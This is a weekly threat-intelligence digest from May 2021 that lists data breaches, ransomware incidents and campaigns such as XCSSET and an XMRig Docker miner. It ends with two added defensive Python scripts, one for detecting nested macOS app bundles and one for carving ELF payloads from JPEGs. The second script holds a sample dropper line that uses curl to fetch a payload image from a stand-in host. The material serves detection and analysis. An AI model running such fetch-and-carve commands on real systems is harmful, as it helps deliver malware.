27 May 2021

Silobreaker’s Weekly Cyber Digest is a quantitative summary of our threat reports, published every Thursday. The reports are created using our award-winning intelligence product Silobreaker Online.

Trending Vulnerable Products

Open Source
Nagios Fusion
VMware vCenter Server
Apple tvOS
FFmpeg
Cisco Small Business

Deep & Dark Web
Xbox 360
WinRAR
Microsoft IIS
Roblox
Electrum Bitcoin Wallet

The tables show the products which have been mentioned more than usual during the last week in connection with vulnerabilities.

Data Leaks & Breaches

Leaks & Breaches
Company | Information | Affected
DailyQuiz | The data of DailyQuiz users was leaked online following an earlier breach of the site’s database. The service has admitted the breach in a message on its website. The leak contains plaintext passwords, emails, and IP addresses for 8.3 million accounts. | 12,800,000
Betenbough Homes (US) | REvil ransomware operators claimed an attack against the Texas builders. The company confirmed a system breach caused by ‘Russian cybercriminals’ on May 3rd, 2021, stating that the attackers obtained some sensitive personal information of individuals. REvil operators have posted a few images of driver’s licences as proof of their claims. | Unknown
ISERBA Group (France) | The property maintenance firm added a notice to its website stating that its IT services had been hacked. | Unknown
Bose Corporation (US) | Bose disclosed a data breach following a ransomware attack against its systems that was detected on March 7th, 2021. The attacker may have accessed a small number of human resources spreadsheets, exposing the names, Social Security numbers, salaries, and more, of current and former employees. | Unknown
Spine & Disc Medical Center (US) | The operators of Avaddon ransomware added the clinic to their leak site and shared some data as evidence of their attack. The attackers claim to have stolen medical licences, tax certificates, medical provider information, images, client information, and more. | Unknown
Zocdoc (US) | The medical appointment booking company disclosed that a ‘programming error’ allowed current and former employees of medical or dental practices to access its portal after their usernames and passwords should no longer have worked. The data stored in the portal includes patient names, email addresses, phone numbers, appointment information, Social Security numbers, insurance details, and medical history. | 7,600
TPG Telecom (Australia) | TPG Telecom disclosed that its legacy IT-as-a-service platform TrustedCloud, which is due to be decommissioned at the end of August 2021, was compromised by an unknown attacker. | 2
Daihatsu Diesel Company (UK) | The company’s European operations were targeted in a cyberattack on May 14th, 2021. The company discovered unauthorised access by a third party that resulted in difficulties accessing the file server on its internal network. | Unknown
Auto Parts Manufacturing Mississippi (US) | The company suffered a ransomware attack that resulted in the theft and leaking of some financial and customer data. | Unknown
BPJS Kesehatan (Indonesia) | Cyble Inc researchers identified a threat actor called ‘kotz’ who claims to possess data belonging to Indonesian residents stolen from BPJS Kesehatan. The data includes full names, dates of birth, mobile phone numbers, email IDs, national identity numbers, and in some cases annual salaries. | 200,000,000
Alaska Department of Health and Social Services (US) | The department’s website was hit by a malware attack that disrupted some online services. An investigation is ongoing to determine whether any confidential or personal information was compromised. | Unknown
Unknown (Turkey) | TechNadu researchers reported seeing databases containing user details from over 300 Turkish betting sites for sale on the internet. According to the seller, 90% of the databases contain usernames, full names, IP addresses, phone numbers, email addresses, and various activity details. The information is dated between August 2019 and May 2021. | Unknown
Finolex (India) | Conti ransomware operators claim to have attacked India’s largest cables manufacturer. The actors purportedly stole 439GB of data, including personal employee details, financial documents, client databases, contracts, and sales reports. Potentially compromised employee data includes addresses, phone numbers, passport scans, and more. Clients’ shipping addresses, phone numbers, and email addresses were also possibly exposed. | Unknown
Adirondack Health (US) | The healthcare provider was impacted by the ransomware attack against its vendor CaptureRx. The personal information of its patients was stolen in the attack, including their names, dates of birth, prescription information, and medical record numbers. | 877
One Call (UK) | The Doncaster insurance company disclosed a ransomware attack that occurred on May 13th, 2021. The operators of DarkSide ransomware demanded a £15 million ransom and threatened to leak data they claim to have stolen, which reportedly includes customer information such as passwords and bank details. | Unknown
Mercari (Japan) | The e-commerce company disclosed that the Codecov supply chain attack exposed thousands of customer records. This includes 17,085 financial records for transactions that took place in 2014, exposing bank codes, branch codes, account numbers, account holders, and transfer amounts. Other impacted data includes records on business partners, employees, and more, exposing names, dates of birth, affiliation, email addresses, and other details. | Unknown
Air India | Air India revealed that an attack against the aviation industry IT company SITA, first disclosed in February 2021, led to the theft of passenger data. The information dates from August 26th, 2011 to February 3rd, 2021, and includes names, dates of birth, credit card data, passport information, contact details, and more. | 4,500,000
Omiai (Japan) | The online dating service provider was targeted in an unauthorised server access incident between April 20th and April 26th, 2021. A threat actor may have stolen images of members’ driver’s licences, health insurance cards and passports. | 1,710,000
The Beech Acres Parenting Center (US) | The Cincinnati centre discovered that an unauthorised actor gained access to some employee email accounts between December 29th, 2020 and March 18th, 2021. Some of the emails contained client information, including names, dates of birth, medical details, and, in some cases, health insurance information and Social Security numbers. | Unknown
Waikato District Health Board (New Zealand) | Journalists have been receiving what appears to be personal and patient information that the threat actors behind the recent ransomware attack against the Waikato DHB claim to have exfiltrated. The attackers stated that they are in possession of confidential patient notes, staff details, and financial information. | Unknown
Federal Public Service Interior (Belgium) | The service was targeted in a cyberattack, believed to be associated with China, that involved the Microsoft Exchange exploit linked to Hafnium. The attack dates back to April 2019, but was only discovered in March 2021. The attack reportedly targeted information held by the service, which maintains the population register, election and crisis management data, police databases, and more. | Unknown
CEFCO (US) | Hackers posted 42GB of data allegedly stolen from the gas station and convenience store chain on the new leaked-data marketplace Marketo Leaks. The published data includes financial documents, contracts, account lists, budget reports, and more, pertaining to clients, partners, and competitors. | Unknown
Harper County Community Hospital (US) | The hospital was targeted in a ransomware attack on March 24th, 2021, compromising the data of patients. Affected information includes Social Security numbers, birthdates, addresses, patient account numbers, medical diagnoses and health insurance details. | 5,725
Bruhat Bengaluru Mahanagara Palike (India) | Free Software Movement of India found that the records of COVID-19 tests in Bengaluru, handled by BBMP, were made public by its contractor Xyram Software Solutions. The leak reportedly affected BBMP’s Public Health Activities, Surveillance and Tracking website. The personal data of anyone who had been tested in Karnataka could be accessed by entering their 10-digit mobile number on the Xyramsoft site. | Unknown
Clover Park School District (US) | An investigation is ongoing following a system outage that caused ‘a technology issue’ in the district. A screenshot sent to KIRO 7 shows a link to a site that threatens to leak sensitive information if no payment is made, a typical threat seen in ransomware attacks. | Unknown
Marietta City School District (US) | The email accounts of several employees were hacked, with some believed to have been compromised since 2018. According to Marietta Police Captain Aaron Nedeff, student information was likely not impacted. | Unknown
Möbelstadt Sommerlad (Germany) | The furniture retailer recently disclosed having been targeted by DarkSide ransomware. According to security researcher Chum1ng0, the company is now listed on the data leak site of REvil ransomware. The threat actors claim to be in possession of over 175GB of data and uploaded some screenshots as proof. | Unknown
Commport Communications (US) | The Canada Post electronic data interchange supplier was targeted in a ransomware attack, compromising the data of its 44 large parcel business customers. In terms of breached records, 97% of the leak consists of package recipient names and addresses, and the remainder includes email addresses or phone numbers. | 950,000
Ministry of Land, Infrastructure, Transport and Tourism (Japan) | The ministry reported that the email addresses of its employees and business partners were leaked, alongside internal mail data. The incident was caused by a compromise of Fujitsu’s ProjectWEB information-sharing software. | 76,000

Attack Type mentions in Government

Time series chart (not reproduced here): the chart shows the trending Attack Types related to Government over the last week.

Weekly Industry View

Industry View
Industry | Information
Banking & Finance | East Security researchers observed a new campaign carried out by the North Korea-linked actor Thallium. The group is known to focus particularly on individuals working on North Korean issues. Thallium is using phishing emails disguised as financial transaction notifications and impersonating domestic commercial banks in South Korea. The emails feature designs similar to legitimate notifications and carry an Excel attachment that tricks the user into enabling malicious macro code. A successful infection may result in a data breach and could spread through the victim’s network.
Government | United States law enforcement discovered a step-by-step tutorial on how to commit unemployment identity fraud through the Texas Workforce Commission website. The guide was posted in a WhatsApp group chat of the Nigerian cybercriminal organisation known as Scattered Canary. The group uses stolen identities obtained from the dark web to file benefit claims, and uses prepaid Green Dot cards to funnel the money offshore before the claims are flagged.
Technology | Jamf Protect researchers discovered an Apple macOS vulnerability exploited by XCSSET malware. The zero-day flaw, tracked as CVE-2021-30713, bypassed the Transparency, Consent, and Control (TCC) framework and allowed the attackers to gain full disk access, screen recording abilities, and other permissions without the user’s explicit consent. XCSSET operators exploited the issue to take screenshots of the victim’s desktop. To exploit the flaw, the malware injects a custom AppleScript into a donor application that already holds screen recording permission, such as Zoom, so that the permission granted to the donor is inherited. The issue was patched in macOS 11.4.
Healthcare | Cyble researchers observed COVID-19 vaccination registration scams targeting Indian users. The scammers call potential victims impersonating officials from legitimate organisations and ask for their names, dates of birth, Aadhaar card details, and other information to purportedly register them for the vaccine. The victims are then tricked into providing one-time passwords associated with their Aadhaar numbers. The fraudsters can then use the submitted details to make unauthorised financial transactions.
Cryptocurrency | SentinelLabs researchers identified an ongoing cryptocurrency mining campaign targeting Docker Linux systems with XMRig. The malware relies on several obfuscation methods rather than specific exploit components. The attacks involve multiple shell scripts, one of which reuses several patterns of base64 encoding, which the researchers take as evidence that the threat actor is inexperienced. The attacker uses steganography to evade detection, downloading a JPEG file that carries an ELF binary.

News and information concerning each mentioned industry over the last week.
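The donor-application trick in the Technology row above lends itself to a simple host check. The script below is an added example, not Jamf’s or the page’s code: it walks a directory of application bundles and flags any .app bundle nested inside another app’s Contents/MacOS folder, reporting whether the nested bundle reuses the outer bundle’s CFBundleIdentifier. That the injected AppleScript lands as its own applet bundle inside the donor, and that identifier reuse is what makes TCC attribute its activity to the donor, are assumptions of this example; the digest only says the script is injected into a donor application. The sample tree, and the names Donor.app, applet.app and com.example.*, are constructed here and are hypothetical.

```python
"""Heuristic: find .app bundles nested inside another app's Contents/MacOS.

Added example for the XCSSET / CVE-2021-30713 summary above; not Jamf's or
the page's code. Assumption (not stated in the digest): the injected
AppleScript is dropped as its own applet bundle inside the donor app and
reuses the donor's bundle identifier. The sample tree is constructed below.
"""
import plistlib
import tempfile
from pathlib import Path
from typing import Optional


def bundle_identifier(app: Path) -> Optional[str]:
    """Read CFBundleIdentifier from <app>/Contents/Info.plist; None if missing or unparseable."""
    info = app / "Contents" / "Info.plist"
    if not info.is_file():
        return None
    try:
        with info.open("rb") as fh:
            return plistlib.load(fh).get("CFBundleIdentifier")
    except (plistlib.InvalidFileException, ValueError):
        return None


def find_nested_bundles(root: Path) -> list:
    """Return one finding per .app bundle located under another .app's Contents/MacOS."""
    findings = []
    for donor in sorted(root.rglob("*.app")):
        macos_dir = donor / "Contents" / "MacOS"
        if not macos_dir.is_dir():
            continue
        for nested in sorted(macos_dir.rglob("*.app")):
            donor_id = bundle_identifier(donor)
            nested_id = bundle_identifier(nested)
            findings.append({
                "donor": donor.name,
                "nested": str(nested.relative_to(donor)),
                "donor_id": donor_id,
                "nested_id": nested_id,
                # a nested applet that reuses the donor's identifier is the worrying case
                "identity_reused": donor_id is not None and donor_id == nested_id,
            })
    return findings


def write_plist(app: Path, identifier: str) -> None:
    """Create <app>/Contents/Info.plist with only a CFBundleIdentifier key."""
    (app / "Contents").mkdir(parents=True, exist_ok=True)
    with (app / "Contents" / "Info.plist").open("wb") as fh:
        plistlib.dump({"CFBundleIdentifier": identifier}, fh)


def build_sample_tree(base: Path) -> Path:
    """Constructed sample (hypothetical names): one clean app, one donor with a nested applet."""
    apps = base / "Applications"
    clean = apps / "Clean.app"
    write_plist(clean, "com.example.clean")
    (clean / "Contents" / "MacOS").mkdir()
    donor = apps / "Donor.app"
    write_plist(donor, "com.example.donor")
    (donor / "Contents" / "MacOS").mkdir()
    applet = donor / "Contents" / "MacOS" / "applet.app"
    write_plist(applet, "com.example.donor")  # reuses the donor's identifier
    return apps


def scan_sample() -> list:
    """Build the constructed tree in a temp dir and scan it."""
    with tempfile.TemporaryDirectory() as tmp:
        return find_nested_bundles(build_sample_tree(Path(tmp)))


if __name__ == "__main__":
    for f in scan_sample():
        flag = "IDENTIFIER REUSED" if f["identity_reused"] else "nested bundle"
        print(f"{flag}: {f['donor']} -> {f['nested']} ({f['nested_id']})")
```

On a real host you would point find_nested_bundles at /Applications and the user’s Applications folder, and cross-check any donor it reports against the applications granted kTCCServiceScreenCapture in the TCC database, which itself requires Full Disk Access to read. Legitimate software does occasionally ship helper bundles inside Contents/MacOS, so treat a hit as a lead to inspect, not a verdict.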
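The two obfuscation steps in the Cryptocurrency row, a JPEG that carries an ELF binary and a loader script wrapped in repeated base64, are straightforward to pull apart once you know where to look. The script below is an added example, not SentinelLabs’ or the page’s code: it carves ELF headers out of an image (an appended payload sits after the JPEG end-of-image marker, where decoders stop reading), decodes the header’s class, endianness, type and machine, and peels nested base64 layers until the content stops looking like base64. The JPEG skeleton, the fake ELF64 header and the stand-in shell script are constructed in the script and are not artefacts from the campaign.

```python
"""Carve an ELF payload appended to a JPEG and peel nested base64 layers.

Added example for the XMRig / Docker campaign summary above; not the
researchers' code. Every input is constructed in this file.
"""
import base64
import binascii
import struct
from typing import Optional

ELF_MAGIC = b"\x7fELF"
JPEG_SOI = b"\xff\xd8"   # start of image
JPEG_EOI = b"\xff\xd9"   # end of image; decoders ignore anything after it
B64_ALPHABET = set(b"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=")


def parse_elf_header(blob: bytes) -> Optional[dict]:
    """Decode the fixed part of an ELF header: e_ident (16 bytes), then e_type and e_machine."""
    if len(blob) < 20 or blob[:4] != ELF_MAGIC:
        return None
    ei_class, ei_data = blob[4], blob[5]
    endian = "<" if ei_data == 1 else ">"
    e_type, e_machine = struct.unpack_from(endian + "HH", blob, 16)
    return {
        "class": {1: "ELF32", 2: "ELF64"}.get(ei_class, "unknown"),
        "endian": "little" if ei_data == 1 else "big",
        "type": {2: "EXEC", 3: "DYN"}.get(e_type, str(e_type)),
        "machine": {3: "x86", 62: "x86_64", 183: "aarch64"}.get(e_machine, str(e_machine)),
    }


def carve_elf_from_image(data: bytes) -> list:
    """Find every ELF magic in a JPEG and note whether it lies past the first EOI marker."""
    if not data.startswith(JPEG_SOI):
        return []
    eoi = data.find(JPEG_EOI)  # first EOI; embedded thumbnails may carry their own, so treat as a hint
    findings, pos = [], 0
    while (pos := data.find(ELF_MAGIC, pos)) >= 0:
        findings.append({
            "offset": pos,
            "after_eoi": eoi >= 0 and pos > eoi,
            "header": parse_elf_header(data[pos:]),
            "payload": data[pos:],  # an appended payload runs to end of file
        })
        pos += len(ELF_MAGIC)
    return findings


def peel_base64(blob: bytes, max_layers: int = 8) -> tuple:
    """Decode nested base64 until the content stops being valid base64; returns (content, layers)."""
    layers = 0
    while layers < max_layers:
        stripped = blob.replace(b"\n", b"").replace(b"\r", b"")
        if not stripped or len(stripped) % 4 or not set(stripped) <= B64_ALPHABET:
            break
        try:
            blob = base64.b64decode(stripped, validate=True)
        except binascii.Error:
            break
        layers += 1
    return blob, layers


def encode_layers(data: bytes, layers: int) -> bytes:
    """Wrap data in the given number of base64 layers (to build the sample)."""
    for _ in range(layers):
        data = base64.b64encode(data)
    return data


# Constructed stand-in for a loader script; not the campaign's script.
SAMPLE_DROPPER = (
    b"#!/bin/sh\n"
    b"# constructed sample: fetch the cover image and carve the payload\n"
    b"curl -s http://example.invalid/cover.jpg -o /tmp/cover.jpg\n"
)


def build_sample_image() -> bytes:
    """Constructed sample: minimal JPEG skeleton followed by a fake ELF64 x86_64 header."""
    app0 = b"\xff\xe0" + struct.pack(">H", 16) + b"JFIF\x00\x01\x01\x00\x00\x01\x00\x01\x00\x00"
    image = JPEG_SOI + app0 + b"\x00" * 32 + JPEG_EOI          # 54 bytes
    e_ident = ELF_MAGIC + bytes([2, 1, 1, 0]) + b"\x00" * 8     # ELF64, little endian, version 1
    elf = e_ident + struct.pack("<HHI", 3, 62, 1) + b"\x00" * 44  # e_type=DYN, e_machine=x86_64
    return image + elf


if __name__ == "__main__":
    for f in carve_elf_from_image(build_sample_image()):
        print(f"ELF at offset {f['offset']} (after EOI: {f['after_eoi']}): {f['header']}")
    script, n = peel_base64(encode_layers(SAMPLE_DROPPER, 3))
    print(f"peeled {n} base64 layers:\n{script.decode()}")
```

The EOI check is what separates this from a plain signature match: an ELF magic inside the compressed scan data would be an odd coincidence, but one after the marker is a payload by construction. The base64 peeler stops as soon as the decoded bytes fall outside the alphabet or are not a multiple of four in length, so a final-layer shell script with `#`, spaces or colons is returned intact rather than being mangled by one decode too many.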
